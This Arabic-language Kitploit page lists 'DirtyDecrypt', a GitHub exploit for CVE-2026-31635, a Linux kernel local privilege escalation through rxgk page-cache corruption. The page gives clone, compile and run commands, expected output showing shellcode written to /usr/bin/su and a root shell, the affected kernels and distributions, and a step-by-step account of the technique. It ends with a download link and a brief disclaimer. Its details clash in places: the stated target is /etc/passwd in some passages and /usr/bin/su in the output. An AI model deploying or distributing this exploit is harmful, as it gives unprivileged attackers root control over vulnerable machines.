Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31635 — CVE-2026-31635 | Kitploit
أدوات/GitHubGitHub/0xblackash/cve-2026-31635
تصعيد الامتيازاتالاستغلالCTFالتعلم والتعليماستغلال الملفات الثنائية
GitHub0xblackash/cve-2026-31635

CVE-2026-31635

CVE-2026-31635

عرض المستودع
52منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🩸 CVE-2026-31635 – DirtyDecrypt

ChatGPT Image May 19, 2026, 10_51_03 PM

تصعيد الامتيازات محليًا في نواة لينكس عبر إفساد ذاكرة التخزين المؤقت للصفحات في RXGK

Version Severity Exploit

"DirtyDecrypt" — جزء من سلسلة استغلالات "Dirty" لعام 2026


📖 نظرة عامة

DirtyDecrypt (CVE-2026-31635) هو ثغرة تصعيد امتيازات محلي في نظام rxrpc الفرعي للنواة (تحديدًا مكون rxgk).

يستغل عدم وجود فحص للنسخ عند الكتابة (COW) أثناء فك تشفير AES-CBC، مما يسمح لمستخدم غير متميز بإفساد ذاكرة التخزين المؤقت للصفحات وتحقيق كتابة عشوائية للملفات، مما يؤدي إلى الوصول للجذر.


✨ الميزات

  • ✅ كود C نظيف ومعلق جيدًا
  • ✅ دعم مساحات أسماء المستخدم والشبكة
  • ✅ بدائية كتابة موثوقة لذاكرة التخزين المؤقت للصفحات
  • ✅ يستهدف /etc/passwd (كلمة مرور الجذر فارغة)
  • ✅ سهل التعديل لاستهداف ملفات SUID الثنائية أو أهداف أخرى
  • ✅ دعم التجميع الثابت

🛠️ الأنظمة المتأثرة

  • النوى الضعيفة: 6.10 ~ 6.13 (مع تفعيل CONFIG_RXGK=y)
  • التوزيعات الشائعة: فيدورا، آرتش لينكس، openSUSE Tumbleweed، النوى المخصصة
  • غير متأثرة: النوى قبل ~6.10 أو تلك التي تحتوي على CONFIG_RXGK=n

📋 المتطلبات

  • نواة لينكس مع تفعيل CONFIG_RXGK
  • وصول مستخدم محلي غير متميز
  • دعم مآخذ AF_RXRPC
  • أداة keyctl (لمفاتيح rxrpc)

🚀 التجميع

root@kitploit:~
git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt

💥 الاستخدام

root@kitploit:~
sudo ./DirtyDecrypt

الخرج الناجح المتوقع:

root@kitploit:~
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000

[*] writing shellcode to /usr/bin/su (96 bytes from offset 0)
    [========================================] 100% (XXX/96, YYYY fires)
[*] XXX fires in Z.Zs
[*] exec /usr/bin/su
[*] restore: cp /tmp/.su_12345 /usr/bin/su

# whoami
root

# id
uid=0(root) gid=0(root) groups=0(root)

# 

📁 هيكل المستودع

root@kitploit:~
DirtyDecrypt/
├── CVE-2026-31635.c          # الاستغلال الرئيسي
├── README.md                 # هذا الملف
├── Makefile                  # اختياري
└── exploit.log               # سجل الخرج الاختياري

🔬 كيف يعمل (تقنيًا)

  1. يدخل مساحة اسم المستخدم والشبكة
  2. يضيف مفتاح RXGK إلى سلسلة المفاتيح
  3. يستخدم مآخذ AF_RXRPC + splice() لإجبار صفحات ذاكرة التخزين المؤقت على مسار فك تشفير RXGK
  4. يطلق فك تشفير AES-CBC في المكان دون استدعاء skb_cow_data()
  5. يفسد الملف المستهدف (/etc/passwd) بايتًا تلو الآخر باستخدام تقنية النافذة المنزلقة
  6. يفرغ كلمة مرور الجذر → يطلق شل الجذر

⚠️ إخلاء مسؤولية

هذا الاستغلال مخصص للاختبارات الأمنية التعليمية والمصرح بها فقط.
الاستخدام غير المصرح به على أنظمة لا تملكها غير قانوني.


📜 الائتمان والمؤلف

  • مؤلف الاستغلال: Ashraf Zaryouh "0xBlackash"
  • الاكتشاف الأصلي: باحثو الأمن (2026)
  • إصدار الإثبات: v2.1 (مايو 2026)

⭐ قم بتمييز هذا المستودع بنجمة إذا ساعدك!

صنع بـ ❤️ من أجل مجتمع الأبحاث

تنزيل الأداة